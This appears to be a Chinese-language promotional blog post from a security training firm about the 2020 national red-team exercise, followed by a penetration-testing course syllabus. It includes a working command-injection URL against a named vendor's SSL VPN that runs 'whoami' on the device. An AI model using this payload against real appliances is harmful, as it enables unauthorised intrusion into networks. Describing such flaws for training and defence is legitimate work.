大郎該吃藥了——2020國家HW進行中

漫漫無情

這項活動由政府牽頭，組織內頂尖的安全滲透公司和組織作為攻方，以實戰手段來檢驗各關鍵信息基礎信息單位（CII）（主要為守方）的網絡安全性。北京鎧撒信息技術有限公司有幸負責幾家能源單位護網期間的運維和防護，北京鎧撒學院的若幹學員通過幾個月的滲透測試與漏掃和加固的學習培訓後，終於被分配到各前沿單位作為駐場加固師和告警分析師（當然 ，鎧撒信息在後台提供事件響應專家組負責指揮）。

HW第一天就發現了深X服和奇X信產品存在巨大漏洞.紅隊遠程添加用戶直接vpn連入內網 . 本人感覺發現的只是冰山一角 .如果去an網裏去看一定能找到更多的0DAY漏洞 . 守方盡管有的企業24小時值班. 把人累死又有何用呢 . 安全公司的系列產品出致命漏洞不就相當於人生病了 ,吃藥 ,結果藥裏有毒嗎 . 我曾經測試過 trend的殺毒軟件被黑客遠程攻擊5168端口. 幾個命令就可以滲透進系統. 只要是人開發的系統都有漏洞 ,安全公司的產品自然也不例外了 .

情景1：

深X服的SSLvpn

https://ip+端口/tool/log/c.php?strip_slashes=

system&host=whoami 注：whoami命令用於顯示當前操作系統用戶名稱

情景2：

從曆年HW的實際情況看，只靠安全產品的簡單堆砌，已經遠遠不能滿足企業在攻防對抗背景下的安全需求。今年又出現安全產品本身帶有ODAY漏洞的現狀，更突顯在HW期間安全產品的可運維能力和安全人員的服務能力的重要性。

對症下藥:

產品要更新，漏洞要填補。

人員技能更重要，網絡安全知識要熟知，滲透測試技能要掌握。

網絡安全意識第一位，專業的網絡安全技能人員培養刻不容緩，各企業深有所感。

關注：

高級信息安全工程師&網絡安全滲透測試工程師

北京鎧撒網安培訓課程視頻網址：http://edu2.cisaa.cn:88/

《CPTE 高級信息安全工程師&網絡安全滲透工程師》認證課程體系：http://www.cisaa.cn/archives/3908

附：《CPTE 高級信息安全工程師&網絡安全滲透工程師》課程大綱

1實驗環境准備

1.1 虛擬機的安裝

1.2 加載windows/和KALI

1.3 部署實驗環境(VPN與NAT)

1.4 典型工具介紹(burp/cain/metasploit等)

2網絡安全

2.1 網絡通訊協議與抓包-TCP/IP ||WIRESHARK

2.2 密碼學與PKI/CA

2.3 網絡MITM中間人攻擊-CAIN||ARPSPOOF

2.4 網絡拒絕服務攻擊 –ARP/SYN/BOTNET

2.5 網絡安全設備-FW/IDS/IPS/蜜網/日志審計

2.6 無線網絡安全 WEP/WPA/WPA2

3系統安全

3.1 WINDOWS 基礎

3.2 LINUX 基礎課程

3.3 緩沖區溢出-永恒之藍ashdirtycow藏牛提權 IRC應用安全

4應用安全

4.1 WEB安全-協議-http

4.2 WEB sql注入-sqlmap/菜刀

4.3 WEB xss/csrf/ssrf 跨站

4.4 WEB 其他代碼繞過網頁木馬

4.5 源代碼審計

4.6 數據庫安全-MYSQL與MSSQL

5等保2.0大數據物理網雲安全人工智能安全

5.1 網絡安全法與等保2.0安全體系框架

5.2 物聯網安全-物聯網通訊架構協議應用場景安全威脅分析

5.3 雲安全-典型安全威脅雲安全治理

5.4 人工智能AI 安全 –算法演化

6輔導.考試與認證

6.1 理論輔導

6.2 實操輔導

6.3 考試

6.4 頒發CPTE 證書

3.4 惡意代碼-病毒木馬蠕蟲移動代碼攻擊

3.5 系統安全審計-syslog